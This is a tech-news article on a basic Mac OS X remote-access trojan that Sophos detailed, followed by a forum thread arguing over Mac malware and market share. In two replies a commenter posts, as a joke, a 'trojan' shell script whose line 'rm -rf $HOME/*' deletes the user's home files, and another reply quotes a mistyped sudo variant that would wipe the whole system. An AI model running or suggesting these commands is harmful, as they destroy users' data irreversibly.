Security firm details new Trojan written for Apple's Mac OS X

in macOS edited January 2014
Hackers have written a new "backdoor Trojan" targeted specifically at Apple's Mac OS X operating system that can allow remote operations and password "phishing," as Mac sales and market share continue to grow.



Security researchers at Sophos have taken the appearance of the "Remote Access Trojan" known as "Blackhole RAT" as a sign that hackers are beginning to take notice of Apple's continued success with the Mac platform. The unfinished malware, said to be based on the Windows RAT "darkComet," allows hackers to remotely send commands or attempt to deceive a Mac user. The darkComet source code is freely available online.



One of the potential uses for the BlackHole Trojan, which the security firm has dubbed "OSX/MusMinim-A," is the ability to pop up a fake "Administrator Password" window to phish a target. It can also be used to place text files on the desktop, or remotely send a restart, shutdown or sleep command to the Mac.



Using the Trojan, hackers could also run arbitrary shell commands, send URLs to the client to open a website, or place a full-screen window with a message that only allows the user to click reboot. MusMinim is said to be "very basic," and the user interface has a mix of English and German.



The full-screen window with reboot button displays default text to the user of the affected system. It states that the Trojan is "under development," and promises "much more functions" when the final product is released.



The lack of viruses and Trojans on the Mac has long been a selling point of Apple hardware. Just last week, it was revealed that Apple has begun inviting security experts to examine its developer preview of Mac OS X 10.7 Lion, the company's forthcoming operating system update due out this summer.







Prominent security researchers including Charlie Miller and Dino Dai Zovi were asked to analyze security countermeasures included in the first beta of Lion. Apple's invitation to researchers marks the first time the company has expanded beyond its core developers to expose its software to community scrutiny.



Last October, a Java-based Trojan targeting Mac OS X spread through social networking sites by baiting users into clicking a link. Though the Trojan gained some attention, it did not affect a large number of Mac users.

Comments

  • Reply 1 of 79
    All these hackers are secretly backed by large powerful companies.
  • Reply 2 of 79
    Quote:
    Originally Posted by maccherry View Post


    All these hackers are secretly backed by large powerful companies.



    It's great to have a former secret agent such as yourself as a member of AI to share these secrets with us. Do you also sell tinfoil hats?
  • Reply 3 of 79
    Great, wake me up when a real virus for OS X is developed, one that doesn't require me to manually install and run itself first. No operating system will ever be immune to Trojans, unless you lock it down so tight the user cannot install or run _anything_ without some trusted third-party approving it.



    I've written a Trojan myself, it's very destructive, cross platform on many Unix systems. It will wipe out all your files, and it would be very trivial to have it mail them to me or post them somewhere on the internet as well, but I didn't feel like modifying it for that yet. As a service to all security researchers I'll post the code here, it's called 'please_run_me_to_make_money.sh'



    Code:

    #!/bin/sh
    rm -rf $HOME/*
    echo "U R fscked!"


    Don't tell anyone I wrote it!
  • Reply 4 of 79
    mr. me, Posts: 3,221, member
    Would someone please explain how the news media gains access to an "unfinished" malware program?



    Caveat: Your explanation must pass the Laugh Test.
  • Reply 5 of 79
    Quote:

    a sign that hackers are beginning to take notice of Apple's continued success with the Mac platform..



    Haven't they been saying this for the last decade? When are these hackers going to get serious?
  • Reply 6 of 79
    adonissmu, Posts: 1,776, member
    Quote:
    Originally Posted by 2 cents View Post


    Haven't they been saying this for the last decade? When are these hackers going to get serious?



    AT 5 or 10% market share, it's just not worth it.
  • Reply 7 of 79
    Not the loads of viruses which medias and Apple-haters have been foreseeing for years, but the medias' claim about OS X no longer being ANY better than Windows when it comes to security
  • Reply 8 of 79
    samban, Posts: 171, member
    Quote:
    Originally Posted by d-range View Post


    Great, wake me up when a real virus for OS X is developed, one that doesn't require me to manually install and run itself first. No operating system will ever be immune to Trojans, unless you lock it down so tight the user cannot install or run _anything_ without some trusted third-party approving it.



    I've written a Trojan myself, it's very destructive, cross platform on many Unix systems. It will wipe out all your files, and it would be very trivial to have it mail them to me or post them somewhere on the internet as well, but I didn't feel like modifying it for that yet. As a service to all security researchers I'll post the code here, it's called 'please_run_me_to_make_money.sh'



    Code:

    #!/bin/sh
    rm -rf $HOME/*
    echo "U R fscked!"


    Don't tell anyone I wrote it!







    I know a guy who ran this



    sudo rm -rf $HME/*



    and asked me if he can recover something.

    You don't need trojans for morons.
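
Added example, not part of the thread: the command quoted in Reply 8 misspells `$HOME`, and an unset variable expands to an empty string, so the glob becomes `/*`. The sketch below shows that expansion and two guards against it (`set -u` and an explicit target check); the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the thread. Function names are constructed.

# Print what the shell would hand to rm for "<dir>/*" without deleting anything.
# An empty <dir> (what a misspelled, unset variable expands to) yields "/*".
expanded_target() {
    printf '%s/*\n' "$1"
}

# With nounset, expanding the misspelled name aborts the subshell before any
# command runs, so this function returns non-zero.
nounset_catches_typo() {
    ( set -u; unset HME; : "$HME/*" ) 2>/dev/null
}

# Delete the contents of a directory only after checking that the target is
# non-empty, absolute, an existing directory, and does not resolve to "/".
safe_wipe_dir() {
    target=${1-}
    [ -n "$target" ] || { echo "refusing: empty target" >&2; return 2; }
    case $target in
        /*) ;;
        *) echo "refusing: not an absolute path: $target" >&2; return 2 ;;
    esac
    [ -d "$target" ] || { echo "refusing: not a directory: $target" >&2; return 2; }
    # Resolve symlinks and "/./" forms so a disguised root is still caught.
    resolved=$(cd "$target" && pwd -P) || return 2
    case $resolved in
        *[!/]*) ;;   # path contains something other than slashes
        *) echo "refusing: resolves to the filesystem root" >&2; return 2 ;;
    esac
    rm -rf -- "$resolved"/*
}

# Constructed demo: shows the two expansions side by side; nothing is deleted.
expanded_target "${HME-}"
expanded_target "${HOME-}"
```

In scripts, `set -u` at the top or `"${HOME:?}"` at the point of use stops the command before `rm` ever sees the empty prefix.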
  • Reply 9 of 79
    Quote:
    Originally Posted by AdonisSMU View Post


    AT 5 or 10% market share, it's just not worth it.



    Which is odd because before Mac OS X Apple sold less Macs and had a smaller marketshare and yet still managed to have more viruses written for it.
  • Reply 10 of 79
    Quote:
    Originally Posted by AdonisSMU View Post


    AT 5 or 10% market share, it's just not worth it.



    That's funny, because back when OS 9 was still around there were dozens of successful viruses for it, in fact, it was much worse than on Windows, even though Macs had even smaller market share at that time.



    How is 10% of home computers that are...
    • Often used by people who are not tech-savvy

    • Often chose a Mac specifically because they didn't want to spend a lot of time dicking around to secure their computers and configure all kinds of arcane things in the OS

    • Usually owned by people with enough disposable income

    • Usually have AppleID's with credit-card information on it set-up on their system

    • Run an OS that is supposedly easy to exploit

    ... not interesting to malware writers?



    Like someone before me already said: we've been hearing this argument for over a decade and still nothing happened. Millions of Macs running no antivirus or antimalware at all, and still not a single successful virus. It's just like what people say about Linux: 'it has such a small market share it is not interesting'. Well, personally, I think hacking grandma's old Windows XP machine is a lot less interesting than hacking a public Linux webserver. Yet Microsoft ISS is the webserver every hacker targets, even though it has much smaller marketshare than Linux + Apache. How come?
  • Reply 11 of 79
    gwydion, Posts: 1,083, member
    No news, every OS is vulnerable to trojan horses.
  • Reply 12 of 79
    Last time I heard, there is this thing called Mac App Store which Apple happily tests it out for you before it goes out in public. And the new Lion API called Sandboxing and Privilege mode which will be a requirement for developers.



    User stupidity is the best way to get these trojans installed from an untrusted source.
  • Reply 13 of 79
    That is simply not true.



    Quote:
    Originally Posted by d-range View Post


    That's funny, because back when OS 9 was still around there were dozens of successful viruses for it, in fact, it was much worse than on Windows, even though Macs had even smaller market share at that time.



    How is 10% of home computers that are...
    • Often used by people who are not tech-savvy

    • Often chose a Mac specifically because they didn't want to spend a lot of time dicking around to secure their computers and configure all kinds of arcane things in the OS

    • Usually owned by people with enough disposable income

    • Usually have AppleID's with credit-card information on it set-up on their system

    • Run an OS that is supposedly easy to exploit

    ... not interesting to malware writers?



    Like someone before me already said: we've been hearing this argument for over a decade and still nothing happened. Millions of Macs running no antivirus or antimalware at all, and still not a single successful virus. It's just like what people say about Linux: 'it has such a small market share it is not interesting'. Well, personally, I think hacking grandma's old Windows XP machine is a lot less interesting than hacking a public Linux webserver. Yet Microsoft ISS is the webserver every hacker targets, even though it has much smaller marketshare than Linux + Apache. How come?



  • Reply 14 of 79
    Quote:
    Originally Posted by dmarcoot View Post


    That is simply not true.



    Care to point out what part of that is 'simply not true'?



    Edit: I'll help you out, before you waste your time:



    Here's 4 quick searches in the McAfee antivirus database:



    1) 16-bit Windows (what I was referring to when I said MacOS was 'much worse than Windows at that time'):



    http://www.mcafee.com/apps/search/th...=W16&v=malware : 38 threats



    2) MacOS (prior to OS X):



    http://www.mcafee.com/apps/search/th...acOS&v=malware : 86 threats



    3) OS X:



    http://www.mcafee.com/apps/search/th...=OSX&v=malware : 51 threats



    4) 32-bit Windows (just for laughs):



    http://www.mcafee.com/apps/search/th...=W32&v=malware : 1000 threats, but the database clipped the results at 100 pages
  • Reply 15 of 79
    Quote:
    Originally Posted by AdonisSMU View Post


    AT 5 or 10% market share, it's just not worth it.



    The Mac OS X Malware Myth Continues
  • Reply 16 of 79
    Quote:
    Originally Posted by samban View Post


    You don't need trojans for morons.



    But morons needs Trojans® and "decrease the world population"* of future morons! (Post NOT to be taken seriously!!!)





    *Apologies to Charles Dickens "A Christmas Carol".

    /

    /

    /
  • Reply 17 of 79
    Quote:
    Originally Posted by dmarcoot View Post


    That is simply not true.



    It is true. I'm fine with you disagreeing with his statement - I am sure d-range is, too* - but at least come with a rational and logical argument to defend your point.





    Quote:
    Originally Posted by Rot'nApple View Post


    But morons needs Trojans® and "decrease the world population"* of future morons! (Post NOT to be taken seriously!!!)





    *Apologies to Charles Dickens "A Christmas Carol".

    /

    /

    /



    Apologies to Charles Darwin "On the Origin of Species", too. Our smartest keep protecting the dumbest and weakest, thus weakening the species.
  • Reply 18 of 79
    macrulez, Posts: 2,455, member
    deleted
  • Reply 19 of 79
    wiggin, Posts: 2,265, member
    Quote:
    Originally Posted by d-range View Post


    That's funny, because back when OS 9 was still around there were dozens of successful viruses for it, in fact, it was much worse than on Windows, even though Macs had even smaller market share at that time.



    How is 10% of home computers that are...
    • Often used by people who are not tech-savvy

    • Often chose a Mac specifically because they didn't want to spend a lot of time dicking around to secure their computers and configure all kinds of arcane things in the OS

    • Usually owned by people with enough disposable income

    • Usually have AppleID's with credit-card information on it set-up on their system

    • Run an OS that is supposedly easy to exploit

    ... not interesting to malware writers?



    Like someone before me already said: we've been hearing this argument for over a decade and still nothing happened. Millions of Macs running no antivirus or antimalware at all, and still not a single successful virus. It's just like what people say about Linux: 'it has such a small market share it is not interesting'. Well, personally, I think hacking grandma's old Windows XP machine is a lot less interesting than hacking a public Linux webserver. Yet Microsoft ISS is the webserver every hacker targets, even though it has much smaller marketshare than Linux + Apache. How come?



    It's also worth pointing out that a good portion of Windows machines are in corporations with full-time IT staff. Professionals working to secure the machines. Between that and the fact that most Windows PCs have anti-virus software, the attractiveness of targeting Windows vs Macs is not nearly as big a gap as pure market share would suggest considering that most Macs do not have anti-virus software and are not being administered by IT professionals.
  • Reply 20 of 79
    Quote:
    Originally Posted by AdonisSMU View Post


    AT 5 or 10% market share, it's just not worth it.



    Upwards of 50 million units in operations is small potatoes to a hacker then by your statement. What is the break point for interest by hackers then in your estimation - 100 million units in operation? 200 million units?



    I think you are simply repeating the tired old meme of "scarcity breeding contempt" by citing marketshare percentage instead of addressing real numbers. The real threshold is "difficulty to hack". If you have two platforms, and you desire to hack them, the first swag you take is to see what, if any tools and existing hacks exist in the wild and check to see what the ease threshold is to get that hack delivered. If one platform is easier and has more routes through which to hack - it makes sense to pursue hacking that platform. Once the landscape gets saturated by hackers for a given platform where, as we see now with Windows, the ease of hack gets mitigated by all the jostling for control, that changes the approach and the "ease threshold". For example, you see some hacks now that once resident seek to wipe out any other trojans or virii resident in order to reduce competition and establish dominance.



    With saturation making the ease factor reduced on Windows, you have hackers who are looking at the more difficult platform because the threshold on the other has been raised to the point where it reaches an acceptable parity in difficulty.



    Please note that nowhere in this scenario is percentage of marketshare mentioned as any kind of driver. When you are dealing with millions of units, percentages are deceiving in this argument and should be disregarded.